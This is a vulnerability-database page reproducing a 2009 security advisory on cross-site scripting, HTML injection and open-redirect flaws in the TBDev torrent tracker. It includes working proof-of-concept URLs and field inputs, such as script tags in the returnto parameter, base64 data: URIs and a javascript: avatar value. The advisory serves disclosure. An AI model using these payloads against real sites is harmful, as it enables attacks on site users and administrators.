TBDev 01-01-2008 Multiple Remote Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1051858 漏洞类型
发布时间 2009-06-24 更新时间 2009-06-24
CVE编号 CVE-2009-2138
CVE-2009-2141
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009060165
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
TBDev - Cross Site Scripting and HTML Injection Vulnerabilities

Version Affected: 01-01-2008 (16th January 2008) (newest)

Info: TBDEV.NET is a project to further enhance, update and develop a
software (php peer-to-peer) from the original torrentbits/bytemonsoon
source code.

Credits: InterN0T

External Links:
http://www.tbdev.net


-:: The Advisory ::-

Vulnerable Function / ID Calls:
returnto

Cross Site Scripting: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=><script>alert(0)</script>
http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=><script>alert(0)</script><br

Cross Site Script Redirection: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/news.php?action=delete&newsid=1&returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&sure=1

Cross Site Script Redirection: (Anyone, the enduser will need to log in
though)
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST]
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

HTML Injection:
1) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Info field: </textarea><script>alert(0)</script> << is reflected
locally only!

2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Avatar field: javascript:alert(0)

2b) Affected Sites by HTML Injection:
http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID

Internet Explorer 6 and perhaps 7 should be triggered by this.
Please see: http://ha.ckers.org/xss.html for more information.
Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other
vulnerabilities)

-:: Solution ::-
Secure redirection calls with referer headers (just an example) and
filter bad characters.

Conclusion:
This system was fun to find bad code in, it sure had a nice diversity of
vulnerabilities.

Reference:
http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe